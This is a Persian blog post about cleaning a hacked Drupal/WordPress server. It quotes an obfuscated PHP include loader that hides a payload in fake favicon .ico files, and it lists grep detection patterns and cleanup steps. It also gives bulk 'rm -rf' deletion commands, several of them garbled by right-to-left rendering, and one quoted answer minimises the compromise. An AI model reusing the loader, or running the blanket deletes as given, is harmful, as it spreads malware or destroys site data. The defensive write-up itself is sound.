هک فایل ico. و index.php و تبدیل شدن به index.html.bak.bak

هک فایل دروپال ico. و index.php و تبدیل شدن به index.html.bak.bak

من سه وب سایت دارم که همه در یک سرور وب میزبانی می شوند. اخیراً در یکی از وب سایت ها کار می کردم و متوجه شدم ، حدود یک ماه پیش ، دسته ای از فایل ها تغییر کرده است. به طور خاص ، همه موارد index.html به index.html.bak.bak تغییر نام داده شده و فایل های index.php در مکان های خود قرار داده شده اند. فایل های index.php نسبتاً ساده هستند. آنها شامل فایلی هستند که در جایی از سیستم هر وب سایت مخفی شده اند (به ظاهر یک پوشه تصادفی) که با کدگذاری JS hex مبهم شده اند ، سپس index.html را چاپ میکنند.

php?>

/*2d4f2*/

@include "\x2fm\x6et\x2fs\x74o\x721\x2dw\x631\x2dd\x66w\x31/\x338\x304\x323\x2f4\x365\x380\x39/\x77w\x77.\x77e\x62s\x69t\x65.\x63o\x6d/\x77e\x62/\x63o\x6et\x65n\x74/\x77p\x2di\x6ec\x6cu\x64e\x73/\x6as\x2fs\x77f\x75p\x6co\x61d\x2ff\x61v\x69c\x6fn\x5f2\x391\x337\x32.\x69c\x6f"

/*2d4f2*/

;echo file_get_contents('index.html.bak.bak')

 

فایل موجود در اینجا کد زیر هست

/mnt/*snip*/www.website.com/web/content/wp-includes/js/swfupload/favicon_291372.ico

در یک دامنه دیگر ، کد زیر بود

/mnt/*snip*/www.website2.com/web/content/wiki/maintenance/hiphop/favicon_249bed.ico

همانطور که احتمالاً حدس می زنید ، اینها در واقع موارد خوبی نیستند - آنها فقط فایلهای php با پسوند دیگری هستند.

هرچه بیشتر پیش میروم به نظر می رسد فایلهای PHP گیج کننده بیشتری وجود دارد که کاملاً ترسناک است. تعداد زیادی از آنها وجود دارد. به نظر می رسد حتی فایل های index.php وردپرس نیز آلوده شده اند. علاوه بر این ، در یکی از وب سایت ها ، فایلی با عنوان "ssh" وجود دارد که به نظر می رسد نوعی فایل باینری باشد (شاید خود برنامه "ssh" باشد؟)

حالا آیا کسی می داند اینها چیست یا چه کاری انجام می دهند؟ چگونه آنها وارد سرور من شدند؟ چگونه می توانم از شر آنها خلاص شوم و مطمئن شوم که هرگز برنخواهند گشت؟

من این مشکلات را در جایی مطرح کردم و جواب های جالبی را دریافت کردم. در ادامه تعدادی از آنها را با هم ببینیم:

جواب اول

در حال حاضر نمی توانید به چیزی در سرور اعتماد کنید.

سیستم عامل را دوباره نصب کنید

نسخه های خوب شناخته شده کد خود را با یک نسخه تمیز یا خوب شناخته شده از پایگاه داده دوباره نصب کنید.

در این مرحله فقط جایگزینی یا حذف فایل های "بد" فایده ای ندارد زیرا مهاجم می توانست کاملاً از "هیچ چیز" تا جایگزینی نرم افزار سطح سیستم با نسخه های هک شده که هر کار دلخواه را انجام می دهد ، انجام دهد. به عنوان مثال ، در یک زمان کسی بدافزار را در یک کامپایلر مینویسد بنابراین حتی اگر مورد اجرایی دوباره ساخته شود ، بدافزار هنوز در آنجا خواهد بود ، همچنین از شناسایی آن توسط اشکالزدایی جلوگیری میکند.

پاک کننده های مختلفی در دسترس است ، اما آنها به دانستن / شناسایی / خنثی سازی هر کاری که ممکن است مهاجم انجام داده باشد متکی هستند ، که این غیر ممکن است.

اگر پشتیبان گیری روزانه خوبی داشته باشید ، می توانید بین "آنچه دارید" و "آنچه قبلا داشته اید" تفاوت ایجاد کنید و ببینید چه چیزی تغییر کرده است ، با این حال هنوز هم باید پایگاه داده خود را به دقت بررسی یا بازیابی کنید زیرا بسیاری از حملات شامل تغییر داده ها هستند ، نه کد

 

جواب دوم

من همین بدافزار را داشتم. 10 تا 15 فایل وجود دارد که بدافزار اضافه یا اصلاح می کند. من از پلاگین Quttera WordPress (رایگان) برای یافتن فایل ها استفاده کردم. بیشتر فایل ها فقط می توانند حذف شوند (مراقب باشید ، شناسه های Quttera بیش از پیش میتوانند آلوده شوند) اما برخی از فایل های وردپرس تغییر پیدا کرده اند و باید جایگزین شوند.

 

جواب سوم

این نمونه هک مشکل بزرگی نیست که شما سایت و سرور خود را پاک کنید. این فقط یک هک پی اچ پی است. از شر تمام فایل ها و کد های مخرب php خلاص شوید و میبینید که به حالت قبل برمیگردد.

 

جواب چهارم

من هنوز راهی پیدا نکردم که چطور از نمایش این فایل ها در سرور جلوگیری کنم؟ اما می تونم با قطعه کد زیر از شرشون خلاص شم ، در اینجا یک خط کد قرار دادم که دونه دونه پوشه ها رو به پایین پیمایش میکنه و اونها رو از بین می بره:

find . -type f -name 'favicon_*.ico' -delete -print

 

جواب پنجم

آیا از فایل های قبل از آلوده شدن نسخه پشتیبان تهیه کردید؟ بهترین کار اینه که از سرور استفاده نکنید و همه چیز را دوباره بازنشانی کنید. شما نمیدونید چه فایل های دیگری نیز می تواند آلوده شده باشند ، بنابراین منطقی نیست که سعی کنید چیزی را که اتفاق افتاده را جبران کنید و فایل های دیگر را به خطر بیندازید ، فقط از ابتدا شروع کنید.

 

خب جواب ها رو دیدیم حالا بریم ببینیم که من چطور بر این مشکل فائق اومدم.

من معتقدم که بالاخره در این حمله برتری داشتم. از آنچه من بصورت آنلاین می خوانم ، این بخشی از سوء استفاده های ابزاری بود. من به اندازه کافی سریع نبودم. مردم ادعا می کنند شما باید سایتها و سرورهای خود را از این بابت حذف کنید. حاضر به انجام این کار نیستم. اگر دسترسی ریشه WHM ندارید ، نمی توانید این حمله را پاک کنید.

 

این هک با چند مورد مشخص می شود:

1. حساب های سرپرستی که ایجاد نکرده اید.
2. نقش هایی که شما در نمایش خود ایجاد نکردید.
3. فایل های مخرب "ico" که با کد PHP در سرور ظاهر می شوند.
4. فایل های php تصادفی در لیست فایل های سایت نشان داده می شوند.
5. تعداد زیادی فایل اضافی "index.php" در سراسر سایت نشان داده می شود.
6. فایل های php و inc که با کد مبهم اصلاح شده اند.
7. عفونت های متقابل سایت در WHM مشترک. فایل های آلوده در پوشه home / cpeasyapache.

بعضی ها معتقدند در جایی که هکرها وارد آن می شوند "درهای پشتی" میباشد. من به این مسئله شک کردم زیرا حساب های مدیر مخرب پشتیبان گیری نمی شدند. آنچه اتفاق می افتاد این بود که فایل های "ico" هر 5 - 10 ساعت در حال ظهور بودند ، و اینها به نوبه خود یک دسته از فایل های رشته ای تصادفی php و فایل های index.php ایجاد می کردند که به فایل ico باز می گشتند. به نظر می رسید این کد می تواند بر چندین سایت مشترک WHM یکسان تأثیر بگذارد.

 

مراحل رفع هک بدون پاک کردن سایت خود:

1. از سایت و پایگاه داده خود پشتیبان تهیه کنید ، سایت را در حالت تعمیر و نگهداری قرار دهید.
2. اطمینان حاصل کنید که به SSH به WHM یا Cpanel دسترسی دارید.
3. وارد سایت شوید و هرگونه حساب کاربری مخرب را حذف کنید.

4- هر نقشی را که اضافه نکردید حذف کنید.

5- از cpanel ، با استفاده از phpmyadmin ، به جداول پایگاه داده خود برای کاربران و نقش ها نگاه کنید ، جداولی را که می دانید نباید وجود داشته باشند ، حذف کنید. (کاربر 0 قرار است آنجا باشد).

6. تمام گذرواژه های پایگاه داده و کاربران را تغییر دهید.

 

از قسمت SSH وارد پوشه public_html شوید و دستور زیر را اجرا کنید:

find -name index.php

اگر می بینید که یک فایل شلوغ در دروپال ظاهر می شود ، شما هک شده اید. قرار است فقط یک فایل index.php وجود داشته باشد.

تمام فایل های index.php را با این دستور پاک کنید:

;\ {} find -name index.php -exec rm -rf

هنگام بروزرسانی جدیدترین دروپال ، فایل اصلی index.php را جایگزین خواهیم کرد.

فایل های آیکونی را با این دستور جستجو کنید.

"find -name "*.ico

اگر با یک دسته از فایلهای آیکونی با پسوند عجیب و غریب که با a شروع می شوند. و دارای یک رشته تصادفی هستند، آنها فایلهای php هستند. من همه فایل های آیکونی را با دستور زیر حذف کردم:

;\ {} find -name "*.ico" -exec rm -rf

اگر می خواهید فایل های آیکونی خود را حفظ کنید ، فقط موارد مشکوک را با ftp به صورت دستی حذف کنید.

من میبینم که فایلهایی غیر از  ico. نیز وجود داشتند که با این هک همراه بودند. راهی آسان برای شناسایی اینکه از کدام پسوند استفاده می کنند باز کردن یکی از فایل های index.php هک شده و متن زیر را کپی کنید:

@include "\057h\157m\145/\147l\145n\143c\057p\165b\154i\143_\150t\155l\057p\162o\146i\154e\163/\164e\163t\151n\147/\0564\0621\142e\071a\067.\151c\157";

و در یک سایت رمزگشا قرار بدید.

این به شما می گوید که به کدام فایل مخرب اشاره شده است. از این اطلاعات برای حذف همه فایل های آن نوع با استفاده از دستور SSH که در بالا گفته شد، اما برای پسوند مخرب به جای .ico استفاده کنید.

سایر فایل های مخرب php را که متعلق نیستند پیدا کنید. در سایت من ، همه آنها فایلهای php با 8 کاراکتر a-z بودند. مانند dkelfesa.php یا موارد دیگر. با استفاده از این regex به دنبال 8 کاراکتر php باشید:

'find . -type f | egrep './[a-z]{8}\.php

هرگونه فایل مشکوک را حذف کنید. به طور معمول نام آنها بی معنا است. اگر آنها را باز کنید و یک مشت کد PHP را ببینید که نمی توانید بخوانید ، قطعا آنها مخرب هستند.

بعد از انجام همه اینها ، من همچنان هک می شدم و نمی توانستم آن را کشف کنم. من تصمیم گرفتم پایگاه داده خود را برای سایت در phpMyAdmin باز کنم و جستجو در تمام جداول را برای:

php?>

هر کد php مخربی که از دست داده ام انجام دهم. به نظر می رسد که وقتی هک اصلی اتفاق افتاد ، هکر از حساب مدیر برای ایجاد بلوکی به نام "توسعه" استفاده کرده بود. او هیچ عنوانی به آن نداد و در بدنه کد php مخرب خود را وارد کرد. سپس این مورد را در سایت فعال کرد. او می تواند از راه دور با آن تماس بگیرد و این سایت با فایل های ico ، فایل های index.php و رشته های تصادفی php مجدداً سایت را ویرایش می کند. یک جستجوی پایگاه داده را برای برچسب php در بالا اجرا کنید و تمام نتایج مربوط به کد مخرب را در سایت خود در گره های محتوا یا بلوک بررسی کنید. کدی را که نمی توانید به راحتی بخوانید حذف کنید.

همچنین تعداد زیادی فایل php و inc در سراسر نصب دروپال وجود داشت که یا با php مخرب در بالای فایل اصلاح شده بودند یا فقط متعلق به آن نبودند. آنها هوشمندانه نامگذاری شدند و به پوشه های ماژول ، پوشه های کتابخانه ، در همه جا منتقل شدند. همانطور که آنها را کشف کردم ، این گریپ ها را ایجاد کردم تا به دیگران کمک کنم آنها را پیدا کنند. متأسفانه من 4 فایل مخرب در فهرست / home / cpeasyapache پیدا کردم. به نظر می رسید که اینها توانایی اسکن همه سایت ها را در میزبان مشترک و آلوده کردن همه آنها دارند. برای جستجوی فایلهای مخرب php و inc از این جستجوها در سطح ریشه WHM استفاده کنید. آنها را بردارید یا تمیز کنید.

  "* find . -type f -name '*.php' | xargs grep -l " *=PHP_VERSION
"* ()find . -type f -name '*.php' | xargs grep -l " *Phar::interceptFileFuncs
"* find . -type f -name '*.php' | xargs grep -l " *@include
"* find . -type f -name '*.php' | xargs grep -l " *interceptFileFuncs
"* (*find . -type f -name '*.php' | xargs grep -l " *eval *( *gzinflate *( *base64_decode
"* find . -type f -name '*.php' | xargs grep -l " *base64_decode
"* find . -type f -name '*.php' | xargs grep -l " *function *wscandir
"* find . -type f -name '*.php' | xargs grep -l " *HTTP/1.0 *404 *Not *Found
"* find . -type f -name '*.php' | xargs grep -l " *@gzuncompress
"* find . -type f -name '*.php' | xargs grep -l " *Array *( *) *; *global
"* find . -type f -name '*.php' | xargs grep -l " *@unserialize

اگر به ریشه سایت خود دسترسی ندارید ، با ارائه دهنده میزبان خود تماس بگیرید تا از طریق الگوهای بالا اسکن کند تا فایل های مخرب حذف شود.

در اینجا مثالی از کد مخرب موجود در فایلی در فهرست / cpeasyapachy از ریشه WHM آورده شده است:

فایل کامل دارای برخی توابع بود که اسکن ریشه ، به دنبال فایل های inc و php ، تغییر مجوز پوشه و ایجاد فایل های index.php بود. 4 فایل در فهرست cpeasyapache وجود داشت که شبیه این بود:

برای دیدن کد کامل اینجا کلیک کنید.

در پایان:

همین که این کار را کردید آخرین نسخه دروپال را بارگیری کرده و در سایت خود کپی کنید. این جایگزین فایل اصلی index.php می شود و سایت شما باید دوباره فعال شود.

آخرین ماژول ها را نصب کنید.

update.php را اجرا کنید.

در آخر ، تنظیمات مجوز فایل را در پوشه public_html بررسی کنید. دایرکتوری ها باید روی 740 و فایل ها روی 644 تنظیم شوند. یک راه سریع برای انجام این کار:

;\ {} find . -type d -exec chmod 740

;\ {} find . -type f -exec chmod 644

پس از پایان کار ، ماژول "Hacked" را نصب کنید تا سایت خود را از نظر تغییرات مرتبط با این هک بررسی کنید.

سایر ماژول های خوب ، امنیت ورود به سیستم و path2ban هستند.

تمام حافظه پنهان سایت و تاریخچه مرورگر وب / حافظه پنهان را پاک کنید.

 

حالا از سایت خود لذت ببرید.

امیدوارم این آموزش برای شما مفید واقع شده باشه. چون این مشکل برای خودم پیش آمده بود و هیچ منبعی نبود که به من کمک کند این مشکل را حل کنم تصمیم گرفتم که کارهایی که خودم انجام دادم رو باهاتون به اشتراک بذارم تا شاید بتواند به شخص دیگری کمک کند.

چنانچه نظر و یا راه حلی دارید با ما به اشتراک بذارید تا شاید کمکی باشد برای دیگران.